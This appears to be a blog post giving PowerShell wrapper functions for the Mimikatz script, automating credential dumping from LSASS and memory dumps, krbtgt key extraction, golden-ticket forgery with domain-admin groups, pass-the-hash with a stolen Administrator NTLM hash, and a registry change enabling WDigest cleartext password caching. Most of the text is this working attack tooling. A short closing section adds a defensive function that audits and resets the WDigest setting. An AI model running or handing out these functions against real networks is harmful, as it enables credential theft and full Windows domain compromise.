Pass the Hash

One of the main security issues with Windows is pass the hash. I added some functions to the Mimikatz PowerShell script that can be found here.

These functions make Mimikatz easier to use. Add them to the end of the Mimikatz script and launch it; the functions are then loaded into memory and the list of available functions is printed.

```powershell
# All functions expect $ScriptPath to hold the directory the Mimikatz script
# was started from (it is not set by this block itself).

Function Global:Invoke-MimiDom {
    if (Test-Path "$ScriptPath\mimi_dom.log") {
        $MimiUser = "didi44"
        Write-Host $ScriptPath -ForegroundColor Green
        $global:mimidata = Get-Content "$ScriptPath\mimi_dom.log"
        # Pull the krbtgt AES key, the domain SID and the domain name out of the lsadump output
        foreach ($line in $mimidata) {
            if ($line -match "aes256_hmac")    { $global:aes    = $($line.Split(":")[1]).Trim() }
            if ($line -match "Domain :")       { $global:domSid = $($line.Split("/")[1]).Trim() }
            if ($line -match "Default Salt :") { $global:domain = $($($line.Split(":")[1]).Trim()).Replace("krbtgt", "") }
        }
        $FullCMD = "kerberos::golden /domain:" + $domain + " /sid:" + $domSid + " /aes256:" + $aes + " /user:" + $MimiUser + " /id:500 /groups:500,501,513,512,520,518,519 /ticket:forged.kirbi"
        Write-Host $FullCMD
        Invoke-Mimikatz -Command "privilege::debug kerberos::purge `"$FullCMD`" `"kerberos::ptt forged.kirbi`" misc::cmd"
    } else {
        Write-Host "there is no mimi_dom.log, please run Invoke-MimiExportDom on a domain controller first" -ForegroundColor Red
    }
}

Function Global:Invoke-MimiStd {
    $global:mimi_tmp = Invoke-Mimikatz
    $mimi_tmp | Out-File "$ScriptPath\mimi.log"
    $global:mimi = Get-Content "$ScriptPath\mimi.log"
    $number = 0
    foreach ($line in $mimi) {
        $number++
        # The two lines after "* Username : Administrator" hold the domain and the NTLM hash
        if ($line -match "\* Username : Administrator") {
            $Global:mimiUsername1 = $($line.Split(":")[1]).Trim()
            $Global:mimiDom1  = $($mimi[$number].Split(":")[1]).Trim()
            $Global:mimiHash1 = $($mimi[$number + 1].Split(":")[1]).Trim()
            break
        }
    }
    Write-Host "$mimiUsername1 $mimiDom1 $mimiHash1"
}

Function Global:Invoke-MimiExportDom {
    if (!(Test-Path "$ScriptPath\mimi_dom.log")) {
        $global:mimi_dom_tmp = Invoke-Mimikatz -Command "privilege::debug `"lsadump::lsa /inject /name:krbtgt`""
        $global:mimi_dom_tmp | Out-File "$ScriptPath\mimi_dom.log"
        $global:mimi_dom = Get-Content "$ScriptPath\mimi_dom.log"
    }
}

Function Global:Invoke-MimiDMP {
    $dmps = Get-ChildItem "$ScriptPath\*.dmp"
    foreach ($dmp in $dmps) {
        Write-Host "analysing $dmp" -ForegroundColor Green
        $global:mimi = Invoke-Mimikatz -Command "privilege::debug `"sekurlsa::minidump $dmp`" sekurlsa::logonpasswords"
        Write-Host $mimi
    }
}

Function Global:Invoke-MimiCMD {
    if ([string]::IsNullOrEmpty($mimiUsername1)) {
        Write-Host "please run Invoke-MimiStd first" -ForegroundColor Red
    } else {
        $command = "privilege::debug `"sekurlsa::pth /user:" + $mimiUsername1 + " /domain:" + $mimiDom1 + " /ntlm:" + $mimiHash1 + " /run:cmd`""
        Write-Host "$command"
        $global:mimi = Invoke-Mimikatz -Command $command
    }
}

# sekurlsa::pth /user:USERNAME /domain:DOMAIN /ntlm:HASH /run:COMMAND

if ($(Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\).UseLogonCredential -ne 1) {
    reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1
    Write-Host "changed security provider - to see the password in cleartext, log off and log on again" -ForegroundColor Yellow
}

Write-Host "the following functions are available:"
Write-Host "Invoke-MimiStd" -ForegroundColor Green
Write-Host "Invoke-MimiExportDom" -ForegroundColor Green
Write-Host "Invoke-MimiDom" -ForegroundColor Green
Write-Host "Invoke-MimiDmp" -ForegroundColor Green
Write-Host "Invoke-MimiCMD" -ForegroundColor Green
```
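The registry change at the end of the script is exactly the setting a defender wants to audit. As an added example that is not part of the original script, the following function reports whether WDigest cleartext caching is switched on and, with the `-Remediate` switch (my own name, not from the page), sets the value back to 0; the registry path is the one used above.

```powershell
# Added example (not from the original script): audit the WDigest
# UseLogonCredential value that the script above turns on, and optionally
# turn it back off. Function name and -Remediate switch are my own.
function Test-WDigestCredentialCaching {
    [CmdletBinding()]
    param(
        [switch]$Remediate
    )
    $key  = 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest'
    $name = 'UseLogonCredential'

    $value = (Get-ItemProperty -Path $key -Name $name -ErrorAction SilentlyContinue).$name

    # Only an explicit 1 enables caching. A missing value is the safe default on
    # Windows 8.1 / Server 2012 R2 and later; older systems with KB2871997
    # installed need an explicit 0, which is why remediation always writes 0.
    $enabled = ($value -eq 1)

    $result = [pscustomobject]@{
        Computer                = $env:COMPUTERNAME
        Key                     = $key
        UseLogonCredential      = $value
        CleartextCachingEnabled = $enabled
        Remediated              = $false
    }

    if ($Remediate -and $value -ne 0) {
        # Requires administrative rights. Credentials already cached by LSASS
        # only disappear after the affected users log off and on again (or a reboot).
        Set-ItemProperty -Path $key -Name $name -Type DWord -Value 0
        $result.Remediated = $true
    }

    return $result
}

# Audit only:
Test-WDigestCredentialCaching | Format-List
# Audit and harden:
# Test-WDigestCredentialCaching -Remediate | Format-List
```

A value of 1 on a host that has no documented reason for it is a strong indicator that someone prepared the box for cleartext credential capture and is worth an alert on its own.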
